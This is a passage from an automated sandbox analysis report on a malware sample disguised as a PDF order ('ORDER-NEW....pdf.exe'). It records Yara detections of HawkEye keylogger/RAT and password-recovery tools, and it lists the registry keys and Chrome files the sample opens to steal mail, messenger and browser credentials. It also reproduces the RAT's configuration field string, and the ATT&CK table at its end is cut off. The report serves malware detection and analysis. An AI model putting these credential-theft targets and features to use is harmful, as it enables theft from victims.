              Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6860 -s 1156Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmpB254.tmpJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmpB202.tmpJump to behavior
              Source: ORDER-NEW....pdf.exe, 00000000.00000000.699115256.0000000001690000.00000002.00020000.sdmp, ORDER-NEW....pdf.exe, 00000000.00000000.709749986.0000000001690000.00000002.00020000.sdmp, AppLaunch.exe, 00000005.00000002.932216392.00000000057E0000.00000002.00020000.sdmpBinary or memory string: Program Manager
              Source: ORDER-NEW....pdf.exe, 00000000.00000000.699115256.0000000001690000.00000002.00020000.sdmp, ORDER-NEW....pdf.exe, 00000000.00000000.709749986.0000000001690000.00000002.00020000.sdmp, AppLaunch.exe, 00000005.00000002.932216392.00000000057E0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
              Source: ORDER-NEW....pdf.exe, 00000000.00000000.699115256.0000000001690000.00000002.00020000.sdmp, ORDER-NEW....pdf.exe, 00000000.00000000.709749986.0000000001690000.00000002.00020000.sdmp, AppLaunch.exe, 00000005.00000002.932216392.00000000057E0000.00000002.00020000.sdmpBinary or memory string: Progman
              Source: ORDER-NEW....pdf.exe, 00000000.00000000.699115256.0000000001690000.00000002.00020000.sdmp, ORDER-NEW....pdf.exe, 00000000.00000000.709749986.0000000001690000.00000002.00020000.sdmp, AppLaunch.exe, 00000005.00000002.932216392.00000000057E0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
              Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exeQueries volume information: C:\Users\user\Desktop\ORDER-NEW....pdf.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_00418137 GetSystemTime,memcpy,GetCurrentProcessId,memcpy,GetTickCount,memcpy,QueryPerformanceCounter,memcpy,8_2_00418137
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_004083A1 GetVersionExW,8_2_004083A1
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 18_2_004073B6 memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,18_2_004073B6
              Source: Amcache.hve.9.drBinary or memory string: c:\program files\windows defender\msmpeng.exe

              Stealing of Sensitive Information

              barindex
              Yara detected MailPassView
              Source: Yara matchFile source: 18.0.vbc.exe.400000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.AppLaunch.exe.7f31990.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.AppLaunch.exe.9480000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.AppLaunch.exe.94d834a.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.AppLaunch.exe.9480000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.3.AppLaunch.exe.875dbda.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.AppLaunch.exe.7f31990.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.0.vbc.exe.400000.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.AppLaunch.exe.7e95950.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.AppLaunch.exe.9480345.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.AppLaunch.exe.94d834a.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.3.AppLaunch.exe.8705890.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.3.AppLaunch.exe.875dbda.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.3.AppLaunch.exe.8705bd5.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.3.AppLaunch.exe.8705890.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000005.00000002.933455184.0000000007E95000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000000.843177172.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.933041044.0000000006FAE000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000000.842827239.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.933674801.0000000009480000.00000004.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000003.692797770.0000000008705000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000000.842483097.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000000.843631196.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: AppLaunch.exe PID: 7160, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 4296, type: MEMORYSTR
              Yara detected HawkEye Keylogger
              Source: Yara matchFile source: 0.0.ORDER-NEW....pdf.exe.4a73c3c.19.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.ORDER-NEW....pdf.exe.5af10f4.12.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.0.AppLaunch.exe.400000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.0.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.ORDER-NEW....pdf.exe.4afe15c.9.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.ORDER-NEW....pdf.exe.4afe15c.20.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.ORDER-NEW....pdf.exe.49e970c.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.ORDER-NEW....pdf.exe.49e970c.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.ORDER-NEW....pdf.exe.4afe15c.9.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.ORDER-NEW....pdf.exe.5b7b560.23.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.ORDER-NEW....pdf.exe.5b7b560.11.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.ORDER-NEW....pdf.exe.4a73c3c.19.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.ORDER-NEW....pdf.exe.5b7b560.23.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.ORDER-NEW....pdf.exe.4afe15c.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.ORDER-NEW....pdf.exe.4a73c3c.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.ORDER-NEW....pdf.exe.5af10f4.24.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.ORDER-NEW....pdf.exe.5af10f4.10.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.0.AppLaunch.exe.400000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.ORDER-NEW....pdf.exe.49e970c.21.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.ORDER-NEW....pdf.exe.4a73c3c.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.ORDER-NEW....pdf.exe.5af10f4.24.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.ORDER-NEW....pdf.exe.4afe15c.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.ORDER-NEW....pdf.exe.4a73c3c.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.ORDER-NEW....pdf.exe.5af10f4.12.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.ORDER-NEW....pdf.exe.5b7b560.11.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.ORDER-NEW....pdf.exe.5b7b560.11.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.ORDER-NEW....pdf.exe.49e970c.21.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.ORDER-NEW....pdf.exe.5b7b560.11.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.ORDER-NEW....pdf.exe.4afe15c.20.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.ORDER-NEW....pdf.exe.5af10f4.10.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.0.AppLaunch.exe.400000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.ORDER-NEW....pdf.exe.4a73c3c.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.0.AppLaunch.exe.400000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.ORDER-NEW....pdf.exe.49e970c.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.ORDER-NEW....pdf.exe.49e970c.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000005.00000000.689728198.0000000000402000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.930832405.0000000000402000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000000.690486770.0000000000402000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000000.703620754.0000000005AF1000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000000.690115034.0000000000402000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.932528508.0000000006EA1000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.733884470.00000000047C0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000000.702281950.00000000047C0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000000.691070548.0000000000402000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000000.712572110.0000000005AF1000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.738563781.0000000005AF1000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000000.711229338.00000000047C0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: ORDER-NEW....pdf.exe PID: 6860, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: AppLaunch.exe PID: 7160, type: MEMORYSTR
              Tries to steal Mail credentials (via file / registry access)
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
              Tries to steal Mail credentials (via file registry)
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, PopPassword18_2_00402D74
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, SMTPPassword18_2_00402D74
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: ESMTPPassword18_2_004033B1
              Yara detected WebBrowserPassView password recovery tool
              Source: Yara matchFile source: 8.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.AppLaunch.exe.9480345.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.AppLaunch.exe.9480000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.AppLaunch.exe.9480000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.0.vbc.exe.400000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.AppLaunch.exe.7e95950.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.0.vbc.exe.400000.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.AppLaunch.exe.9480345.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.3.AppLaunch.exe.8705bd5.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.AppLaunch.exe.7e95950.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.3.AppLaunch.exe.8705890.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.3.AppLaunch.exe.8705bd5.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.3.AppLaunch.exe.8705890.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000008.00000000.702441264.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.933455184.0000000007E95000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.933674801.0000000009480000.00000004.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000000.704117458.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000003.692797770.0000000008705000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000000.702788844.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.932528508.0000000006EA1000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000000.703279347.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: AppLaunch.exe PID: 7160, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 6356, type: MEMORYSTR
              Tries to steal Instant Messenger accounts or passwords
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: Yara matchFile source: Process Memory Space: AppLaunch.exe PID: 7160, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected HawkEye Keylogger
              Source: Yara matchFile source: 0.0.ORDER-NEW....pdf.exe.4a73c3c.19.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.ORDER-NEW....pdf.exe.5af10f4.12.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.0.AppLaunch.exe.400000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.0.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.ORDER-NEW....pdf.exe.4afe15c.9.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.ORDER-NEW....pdf.exe.4afe15c.20.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.ORDER-NEW....pdf.exe.49e970c.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.ORDER-NEW....pdf.exe.49e970c.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.ORDER-NEW....pdf.exe.4afe15c.9.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.ORDER-NEW....pdf.exe.5b7b560.23.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.ORDER-NEW....pdf.exe.5b7b560.11.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.ORDER-NEW....pdf.exe.4a73c3c.19.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.ORDER-NEW....pdf.exe.5b7b560.23.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.ORDER-NEW....pdf.exe.4afe15c.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.ORDER-NEW....pdf.exe.4a73c3c.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.ORDER-NEW....pdf.exe.5af10f4.24.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.ORDER-NEW....pdf.exe.5af10f4.10.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.0.AppLaunch.exe.400000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.ORDER-NEW....pdf.exe.49e970c.21.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.ORDER-NEW....pdf.exe.4a73c3c.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.ORDER-NEW....pdf.exe.5af10f4.24.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.ORDER-NEW....pdf.exe.4afe15c.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.ORDER-NEW....pdf.exe.4a73c3c.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.ORDER-NEW....pdf.exe.5af10f4.12.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.ORDER-NEW....pdf.exe.5b7b560.11.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.ORDER-NEW....pdf.exe.5b7b560.11.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.ORDER-NEW....pdf.exe.49e970c.21.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.ORDER-NEW....pdf.exe.5b7b560.11.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.ORDER-NEW....pdf.exe.4afe15c.20.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.ORDER-NEW....pdf.exe.5af10f4.10.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.0.AppLaunch.exe.400000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.ORDER-NEW....pdf.exe.4a73c3c.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.0.AppLaunch.exe.400000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.ORDER-NEW....pdf.exe.49e970c.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.ORDER-NEW....pdf.exe.49e970c.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000005.00000000.689728198.0000000000402000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.930832405.0000000000402000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000000.690486770.0000000000402000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000000.703620754.0000000005AF1000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000000.690115034.0000000000402000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.932528508.0000000006EA1000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.733884470.00000000047C0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000000.702281950.00000000047C0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000000.691070548.0000000000402000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000000.712572110.0000000005AF1000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.738563781.0000000005AF1000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000000.711229338.00000000047C0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: ORDER-NEW....pdf.exe PID: 6860, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: AppLaunch.exe PID: 7160, type: MEMORYSTR
              Detected HawkEye Rat
              Source: ORDER-NEW....pdf.exe, 00000000.00000002.733884470.00000000047C0000.00000004.00000001.sdmpString found in binary or memory: _Version_Mutex_Delivery_EmailUsername_EmailPassword_EmailServer_EmailPort_EmailSSL_FTPServer_FTPUsername_FTPPassword_FTPPort_FTPSFTP_ProxyURL_ProxySecret_PanelURL_PanelSecret_LogInterval_PasswordStealer_KeyStrokeLogger_ClipboardLogger_ScreenshotLogger_WebCamLogger_SystemInfo_Install_InstallLocation_InstallFolder_InstallFileName_InstallStartup_InstallStartupPersistance_HistoryCleaner_ZoneID_HideFile_MeltFile_Disablers_DisableTaskManager_DisableCommandPrompt_DisableRegEdit_ProcessProtection_ProcessElevation_AntiVirusKiller_BotKiller_AntiDebugger_ExecutionDelay_FakeMessageShow_FakeMessageTitle_FakeMessageText_FakeMessageIcon_WebsiteVisitor_WebsiteVisitorVisible_WebsiteVisitorSites_WebsiteBlocker_WebsiteBlockerSites_FileBinder_FileBinderFiles
              Source: ORDER-NEW....pdf.exe, 00000000.00000000.703620754.0000000005AF1000.00000004.00000001.sdmpString found in binary or memory: _Version_Mutex_Delivery_EmailUsername_EmailPassword_EmailServer_EmailPort_EmailSSL_FTPServer_FTPUsername_FTPPassword_FTPPort_FTPSFTP_ProxyURL_ProxySecret_PanelURL_PanelSecret_LogInterval_PasswordStealer_KeyStrokeLogger_ClipboardLogger_ScreenshotLogger_WebCamLogger_SystemInfo_Install_InstallLocation_InstallFolder_InstallFileName_InstallStartup_InstallStartupPersistance_HistoryCleaner_ZoneID_HideFile_MeltFile_Disablers_DisableTaskManager_DisableCommandPrompt_DisableRegEdit_ProcessProtection_ProcessElevation_AntiVirusKiller_BotKiller_AntiDebugger_ExecutionDelay_FakeMessageShow_FakeMessageTitle_FakeMessageText_FakeMessageIcon_WebsiteVisitor_WebsiteVisitorVisible_WebsiteVisitorSites_WebsiteBlocker_WebsiteBlockerSites_FileBinder_FileBinderFiles
              Source: AppLaunch.exe, 00000005.00000000.689728198.0000000000402000.00000040.00000001.sdmpString found in binary or memory: _Version_Mutex_Delivery_EmailUsername_EmailPassword_EmailServer_EmailPort_EmailSSL_FTPServer_FTPUsername_FTPPassword_FTPPort_FTPSFTP_ProxyURL_ProxySecret_PanelURL_PanelSecret_LogInterval_PasswordStealer_KeyStrokeLogger_ClipboardLogger_ScreenshotLogger_WebCamLogger_SystemInfo_Install_InstallLocation_InstallFolder_InstallFileName_InstallStartup_InstallStartupPersistance_HistoryCleaner_ZoneID_HideFile_MeltFile_Disablers_DisableTaskManager_DisableCommandPrompt_DisableRegEdit_ProcessProtection_ProcessElevation_AntiVirusKiller_BotKiller_AntiDebugger_ExecutionDelay_FakeMessageShow_FakeMessageTitle_FakeMessageText_FakeMessageIcon_WebsiteVisitor_WebsiteVisitorVisible_WebsiteVisitorSites_WebsiteBlocker_WebsiteBlockerSites_FileBinder_FileBinderFiles
              Source: AppLaunch.exe, 00000005.00000002.930832405.0000000000402000.00000040.00000001.sdmpString found in binary or memory: _Version_Mutex_Delivery_EmailUsername_EmailPassword_EmailServer_EmailPort_EmailSSL_FTPServer_FTPUsername_FTPPassword_FTPPort_FTPSFTP_ProxyURL_ProxySecret_PanelURL_PanelSecret_LogInterval_PasswordStealer_KeyStrokeLogger_ClipboardLogger_ScreenshotLogger_WebCamLogger_SystemInfo_Install_InstallLocation_InstallFolder_InstallFileName_InstallStartup_InstallStartupPersistance_HistoryCleaner_ZoneID_HideFile_MeltFile_Disablers_DisableTaskManager_DisableCommandPrompt_DisableRegEdit_ProcessProtection_ProcessElevation_AntiVirusKiller_BotKiller_AntiDebugger_ExecutionDelay_FakeMessageShow_FakeMessageTitle_FakeMessageText_FakeMessageIcon_WebsiteVisitor_WebsiteVisitorVisible_WebsiteVisitorSites_WebsiteBlocker_WebsiteBlockerSites_FileBinder_FileBinderFiles

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid Accounts111
              Windows Management Instrumentation              		Path Interception412
              Process Injection              		11
              Disable or Modify Tools              		1
              OS Credential Dumping              		1
              System Time Discovery              		Remote Services11
